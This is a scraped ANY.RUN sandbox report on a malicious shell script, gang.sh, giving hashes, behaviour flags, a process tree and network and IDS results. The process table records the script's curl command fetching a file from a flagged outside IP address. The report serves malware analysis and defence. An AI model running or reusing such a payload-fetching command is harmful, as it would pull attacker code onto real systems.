Malware analysis gang.sh Malicious activity | ANY.RUN

Add for printing

File name:	gang.sh
Full analysis:	https://app.any.run/tasks/a8f0aac8-cebb-431d-a2f3-435bcb99497c
Verdict:	Malicious activity
Analysis date:	March 24, 2025, 10:53:56
OS:	Ubuntu 22.04.2
MIME:	text/x-shellscript
File info:	Bourne-Again shell script, ASCII text executable
MD5:	8982AF27584151FEAE413000DF9916E9
SHA1:	7DFA1844003AB45A8CAB107ED0F7F3572D9E8D05
SHA256:	77497770032B556735E1A773A506464FA2CB32C90F6F7AF24AA4CC8E129CEF5A
SSDEEP:	24:kVwgbRBXVt8I0rzFYvpUsV+DC0/wCfLsIvDC0/wCk8HKozL7U:QtVtLOrs2CywCjsaCywCkOKUL7U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 40658)
- Reads passwd file
  - dumpe2fs (PID: 40693)
  - dumpe2fs (PID: 40685)
  - curl (PID: 40664)
  - ps (PID: 40718)
  - ps (PID: 40707)
  - ps (PID: 40728)
  - ps (PID: 40736)
  - ps (PID: 40744)
  - ps (PID: 40779)
  - ps (PID: 40765)
  - ps (PID: 40751)
  - ps (PID: 40758)
  - ps (PID: 40772)
  - ps (PID: 40792)
  - ps (PID: 40799)
  - ps (PID: 40806)
  - ps (PID: 40813)
- Gets information about currently running processes
  - bash (PID: 40662)
  - bash (PID: 40713)
- Executes commands using command-line interpreter
  - sudo (PID: 40661)
- Check the Environment Variables Related to System Identification (os-release)
  - curl (PID: 40664)
- Creates files in the user directory
  - curl (PID: 40664)
  - tracker-extract-3 (PID: 40701)
INFO
- Checks timezone
  - dumpe2fs (PID: 40693)
  - dumpe2fs (PID: 40685)
  - ps (PID: 40707)
  - ps (PID: 40718)
  - ps (PID: 40736)
  - ps (PID: 40728)
  - ps (PID: 40744)
  - ps (PID: 40779)
  - ps (PID: 40758)
  - ps (PID: 40751)
  - ps (PID: 40765)
  - ps (PID: 40772)
  - ps (PID: 40792)
  - ps (PID: 40799)
  - ps (PID: 40806)
  - ps (PID: 40813)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.sh	\|	Linux/UNIX shell script (100)

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

335

Monitored processes

115

Malicious processes

2

Suspicious processes

2

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
40657	/bin/sh -c "sudo chown user /tmp/gang\.sh && chmod +x /tmp/gang\.sh && DISPLAY=:0 sudo -iu user /tmp/gang\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN Exit code: 0
40658	sudo chown user /tmp/gang.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40659	chown user /tmp/gang.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
40660	chmod +x /tmp/gang.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40661	sudo -iu user /tmp/gang.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40662	/bin/bash /tmp/gang.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
40663	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
40664	/snap/curl/1754/bin/curl -k -O http://176.65.138.157/45343534.png	/snap/curl/1754/bin/curl		bash
User: user Integrity Level: UNKNOWN Exit code: 0
40677	/snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info	/snap/snapd/20290/usr/lib/snapd/snap-seccomp	—	curl
User: user Integrity Level: UNKNOWN Exit code: 0
40684	/snap/snapd/20290/usr/lib/snapd/snap-confine --base core20 snap.curl.curl /usr/lib/snapd/snap-exec curl -k -O http://176.65.138.157/45343534.png	/snap/snapd/20290/usr/lib/snapd/snap-confine	—	curl
User: root Integrity Level: UNKNOWN Exit code: 0

Add for printing

Executable files

0

Suspicious files

0

Text files

1

Unknown types

0

Dropped files

PID	Process	Filename		Type
40701	tracker-extract-3	/home/user/.cache/tracker3/files/errors/958c612ed5c0515d0caf85de03a95cc9		text
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

2

TCP/UDP connections

9

DNS requests

11

Threats

2

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	185.125.190.48:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
40664	curl	GET	404	176.65.138.157:80	http://176.65.138.157/45343534.png	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	185.125.190.48:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
1178	snap-store	207.211.211.27:443	odrs.gnome.org	—	US	whitelisted
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
512	snapd	185.125.188.58:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.55:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
40664	curl	176.65.138.157:80	—	—	DE	unknown

DNS requests

Domain	IP	Reputation
connectivity-check.ubuntu.com	185.125.190.48 185.125.190.49 91.189.91.96 185.125.190.17 185.125.190.96 185.125.190.97 185.125.190.98 91.189.91.98 185.125.190.18 91.189.91.48 91.189.91.97 91.189.91.49 2620:2d:4002:1::198 2620:2d:4002:1::197 2620:2d:4000:1::22 2620:2d:4000:1::23 2001:67c:1562::24 2620:2d:4002:1::196 2620:2d:4000:1::98 2620:2d:4000:1::96 2620:2d:4000:1::2b 2620:2d:4000:1::97 2620:2d:4000:1::2a 2001:67c:1562::23	whitelisted
google.com	172.217.16.206 2a00:1450:4001:82b::200e	whitelisted
odrs.gnome.org	207.211.211.27 169.150.255.180 195.181.175.40 169.150.255.183 212.102.56.178 195.181.170.19 37.19.194.81 2a02:6ea0:c700::107 2a02:6ea0:c700::18 2a02:6ea0:c700::11 2a02:6ea0:c700::19 2a02:6ea0:c700::21 2a02:6ea0:c700::112 2a02:6ea0:c700::101	whitelisted
api.snapcraft.io	185.125.188.58 185.125.188.55 185.125.188.59 185.125.188.54 2620:2d:4000:1010::6d 2620:2d:4000:1010::42 2620:2d:4000:1010::117 2620:2d:4000:1010::344	whitelisted
7.100.168.192.in-addr.arpa	—	unknown

Threats

PID	Process	Class	Message
40664	curl	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
40664	curl	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 29

Add for printing

No debug info

General Info

gang.sh

8982AF27584151FEAE413000DF9916E9

7DFA1844003AB45A8CAB107ED0F7F3572D9E8D05

77497770032B556735E1A773A506464FA2CB32C90F6F7AF24AA4CC8E129CEF5A

24:kVwgbRBXVt8I0rzFYvpUsV+DC0/wCfLsIvDC0/wCk8HKozL7U:QtVtLOrs2CywCjsaCywCkOKUL7U

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

SUSPICIOUS

Modifies file or directory owner

Reads passwd file

Gets information about currently running processes

Executes commands using command-line interpreter

Check the Environment Variables Related to System Identification (os-release)

Creates files in the user directory

INFO

Checks timezone

Malware configuration

Static information

TRiD

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings